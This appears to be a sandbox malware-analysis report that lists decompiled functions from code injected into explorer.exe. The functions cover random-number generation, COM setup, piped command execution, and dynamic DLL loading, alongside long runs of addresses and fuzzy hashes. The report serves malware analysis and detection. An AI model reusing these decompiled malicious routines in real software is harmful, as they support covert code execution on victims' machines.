        0x000ce8f8
        0x000ce901
        0x000ce94a
        0x000ce94c
        0x000ce953
        0x000ce954
        0x000ce957
        0x000ce95d
        0x000ce961
        0x000ce962
        0x000ce967
        0x000ce969
        0x000ce96f
        0x000ce984
        0x000ce98c
        0x000ce9c1
        0x000ce9c6
        0x000ce9cb
        0x00000000
        0x000ce9cd
        0x000ce98e
        0x000ce990
        0x000ce990
        0x000ce999
        0x000ce99c
        0x000ce99e
        0x000ce9a0
        0x000ce9a6
        0x000ce9a6
        0x000ce9ab
        0x000ce9ad
        0x000ce9b4
        0x000ce9b4
        0x00000000
        0x000ce9b7
        0x000ce971
        0x000ce979
        0x00000000
        0x000ce903
        0x000ce903
        0x000ce909
        0x000ce90f
        0x000ce912
        0x00000000
        0x000ce912
        0x000ce901
        0x000ce87e
        0x000ce884
        0x000ce888
        0x000ce889
        0x000ce88e
        0x000ce890
        0x000ce896
        0x000ce8b4
        0x000ce8b4
        0x00000000
        0x000ce8b4
        0x000ce898
        0x000ce8a2
        0x000ce8a4
        0x000ce8a5
        0x000ce8aa
        0x000ce8ac
        0x000ce8b2
        0x00000000
        0x00000000
        0x00000000
        0x000ce86b
        0x000ce86b
        0x000ce914
        0x000ce914
        0x000ce91a
        0x000ce91d
        0x00000000
        0x000ce91d
        0x000ce81c
        0x000ce81c
        0x000ce91f
        0x000ce91f
        0x000ce925
        0x000ce928
        0x00000000
        0x000ce928
        0x000ce81a
        0x000ce785
        0x000ce92a
        0x000ce92d
        0x000ce92f
        0x000ce932
        0x000ce935
        0x000ce93e
        0x000ce943
        0x00000000
        0x00000000
        0x000ce947
        0x00000000
        0x000ce947
        0x000ce754
        0x00000000

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
        • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D16B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 28%
        			E000D16B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















        0x000d16c1
        0x000d16c8
        0x000d16d1
        0x000d16d5
        0x000d1750
        0x00000000
        0x000d1752
        0x000d16e3
        0x000d16e5
        0x000d16ea
        0x00000000
        0x00000000
        0x000d16f2
        0x000d16f4
        0x000d16f9
        0x00000000
        0x00000000
        0x000d1703
        0x000d1707
        0x00000000
        0x00000000
        0x000d1709
        0x000d170e
        0x000d1710
        0x000d1711
        0x000d1715
        0x000d171b
        0x00000000
        0x00000000
        0x000d1726
        0x000d172f
        0x000d1733
        0x00000000
        0x00000000
        0x000d1735
        0x000d1737
        0x000d173f
        0x000d1741
        0x000d1742
        0x000d174a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
        • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
        Download Yara Rule
        C-Code - Quality: 87%
        			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000D2285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000D22CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xd09b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














        0x000d2125
        0x000d212a
        0x000d212e
        0x000d212e
        0x000d2133
        0x000d2138
        0x000d2139
        0x000d213c
        0x000d213d
        0x000d2142
        0x000d2145
        0x000d2146
        0x000d214b
        0x000d2152
        0x000d21f8
        0x000d21f8
        0x00000000
        0x000d2161
        0x000d2161
        0x000d2168
        0x000d216c
        0x000d2173
        0x000d217c
        0x000d217e
        0x000d217e
        0x000d217c
        0x000d218d
        0x000d21b3
        0x000d21bc
        0x000d21be
        0x000d21c4
        0x000d21f3
        0x000d21f3
        0x000d21fb
        0x000d21fe
        0x000d21fe
        0x000d21c6
        0x000d21c7
        0x000d21cd
        0x000d21cf
        0x000d21cf
        0x000d21d4
        0x000d21d3
        0x000d21d3
        0x000d21db
        0x000d21e7
        0x000d21f1
        0x000d21f1
        0x00000000
        0x000d219d
        0x000d219d
        0x000d219d
        0x000d21a3
        0x00000000
        0x00000000
        0x000d21a5
        0x000d21ab
        0x000d21b0
        0x00000000
        0x000d21b0
        0x000d218d

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
        • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D02B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
        • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CD748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
        Download Yara Rule
        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
        • SysAllocString.OLEAUT32(?), ref: 000CD764
        • SysAllocString.OLEAUT32(00000000), ref: 000CD778
        • SysFreeString.OLEAUT32(?), ref: 000CD7F3
        • SysFreeString.OLEAUT32(?), ref: 000CD7F6
        • SysFreeString.OLEAUT32(?), ref: 000CD7FB
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
        • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
        • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D07F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
        • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
        • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CD523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
        Download Yara Rule
        C-Code - Quality: 30%
        			E000CD523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000C8604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













        0x000cd530
        0x000cd533
        0x000cd536
        0x000cd547
        0x000cd54d
        0x000cd55e
        0x000cd566
        0x000cd5b7
        0x000cd5b7
        0x000cd5bc
        0x000cd5c1
        0x000cd5c1
        0x000cd5c4
        0x000cd5c9
        0x000cd5ce
        0x000cd5ce
        0x000cd5d1
        0x000cd568
        0x000cd569
        0x000cd56f
        0x000cd580
        0x000cd585
        0x00000000
        0x000cd587
        0x000cd594
        0x000cd59c
        0x00000000
        0x000cd59e
        0x000cd5a0
        0x000cd5a8
        0x00000000
        0x000cd5aa
        0x000cd5ad
        0x000cd5b3
        0x000cd5b3
        0x000cd5a8
        0x000cd59c
        0x000cd585
        0x000cd5d6

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
        • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
        • SysAllocString.OLEAUT32(00000000), ref: 000CD569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
        • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
        • Opcode Fuzzy Hash: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
        • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D21FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000D21FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000D22CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000D2291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xd8250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000D2291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xd8258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











        0x000d21ff
        0x000d2207
        0x000d220c
        0x000d220f
        0x000d2214
        0x000d221a
        0x000d2223
        0x000d2227
        0x000d2227
        0x000d2223
        0x000d2229
        0x000d222e
        0x000d2237
        0x000d223c
        0x000d223f
        0x000d2248
        0x000d224a
        0x000d2251
        0x000d2262
        0x000d2262
        0x000d2264
        0x000d226c
        0x000d2273
        0x00000000
        0x000d226e
        0x000d2272
        0x000d2272
        0x000d2253
        0x000d2253
        0x000d2259
        0x000d225b
        0x000d2260
        0x000d2276
        0x000d2279
        0x000d227e
        0x00000000
        0x00000000
        0x00000000
        0x000d2260

        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
        • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E000CA9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000C861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000C8604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xde684; // 0x64f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0xde684; // 0x64f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000C91A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E000C9292(_t127);
						E000C861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E000CC379(_t127));
				_t98 =  *0xde68c; // 0x64fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E000C9256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E000C861A( &_v32, 0);
				return _t128;
			}




































        0x000ca9c2
        0x000ca9c4
        0x000ca9d0
        0x000ca9d5
        0x000ca9d8
        0x000ca9da
        0x000ca9dd
        0x000ca9e0
        0x000ca9e7
        0x000ca9ea
        0x000ca9f1
        0x000ca9f4
        0x000ca9fe
        0x000ca9ff
        0x000caa02
        0x000caa04
        0x000caa05
        0x000caa1c
        0x000cab9c
        0x00000000
        0x000cab9c
        0x000caa33
        0x000cab68
        0x000cab6e
        0x000cab79
        0x000cab7b
        0x000cab83
        0x000cab83
        0x000cab8a
        0x000cab8c
        0x000cab95
        0x000cab95
        0x00000000
        0x000cab98
        0x000caa39
        0x000caa3c
        0x000caa3f
        0x000caa45
        0x000caa4f
        0x000caa59
        0x000caa60
        0x000caa69
        0x000caa6b
        0x000caa71
        0x00000000
        0x00000000
        0x000caa7c
        0x000caa83
        0x000caa84
        0x000caa89
        0x000caa8a
        0x000caa8b
        0x000caa90
        0x000caa92
        0x000caa93
        0x000caa94
        0x000caa97
        0x000caa9d
        0x00000000
        0x00000000
        0x000caaa3
        0x000caaab
        0x000caaae
        0x000caab6
        0x000caab9
        0x000caabc
        0x000caac2
        0x000caad6
        0x000caadc
        0x000caae2
        0x000cab0b
        0x000caae4
        0x000caae4
        0x000caae6
        0x000caae8
        0x000caaf0
        0x000caaf8
        0x000caafd
        0x000caafd
        0x000cab11
        0x000cab13
        0x000cab13
        0x000cab1b
        0x000cab23
        0x000cab24
        0x000cab29
        0x000cab32
        0x000cab52
        0x000cab52
        0x000cab5a
        0x000cab5d
        0x000cab65
        0x00000000
        0x000cab65
        0x000cab3b
        0x000cab3f
        0x00000000
        0x00000000
        0x000cab47
        0x00000000

        APIs
        • memset.MSVCRT ref: 000CA9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
        • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
        • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
        • Opcode Fuzzy Hash: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
        • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CC4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0xde688; // 0xf0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000C95E1(_t50, 0xb62);
					_t66 =  *0xde688; // 0xf0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
					_t20 =  *0xde688; // 0xf0000
					asm("sbb eax, eax");
					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0xde688; // 0xf0000
					_t68 = E000C92E5(_t26 + 0x1020);
					_v12 = _t68;
					E000C85D5( &_v8);
					_t32 =  *0xde688; // 0xf0000
					_t34 = E000C92E5(_t32 + 0x122a);
					 *0xde784 = _t34;
					_t35 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0xde784);
					 *0xde77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E000CE171(0xdbb48, _t60);
					}
					 *0xde780 = _t38;
					E000C861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0xde780 != 0) {
						goto L10;
					} else {
						E000C861A(0xde784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0xde780 == 0) {
						_t46 =  *0xde6bc; // 0x64fa18
						 *0xde780 = _t46;
					}
					L10:
					return 1;
				}
			}


























        0x000cc4ce
        0x000cc4ce
        0x000cc4ce
        0x000cc4d1
        0x000cc4dd
        0x000cc4e8
        0x000cc504
        0x000cc509
        0x000cc512
        0x000cc514
        0x000cc51c
        0x000cc53d
        0x000cc542
        0x000cc54f
        0x000cc55a
        0x000cc561
        0x000cc568
        0x000cc579
        0x000cc57f
        0x000cc582
        0x000cc599
        0x000cc5a5
        0x000cc5ad
        0x000cc5b4
        0x000cc5ba
        0x000cc5c6
        0x000cc5cc
        0x000cc5d3
        0x000cc5e6
        0x000cc5d5
        0x000cc5d5
        0x000cc5d8
        0x000cc5de
        0x000cc5e3
        0x000cc5e8
        0x000cc5f3
        0x000cc605
        0x000cc617
        0x00000000
        0x000cc619
        0x000cc620
        0x00000000
        0x000cc626
        0x000cc627
        0x000cc627
        0x000cc62e
        0x000cc630
        0x000cc635
        0x000cc635
        0x000cc63a
        0x000cc63e
        0x000cc63e

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
        • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
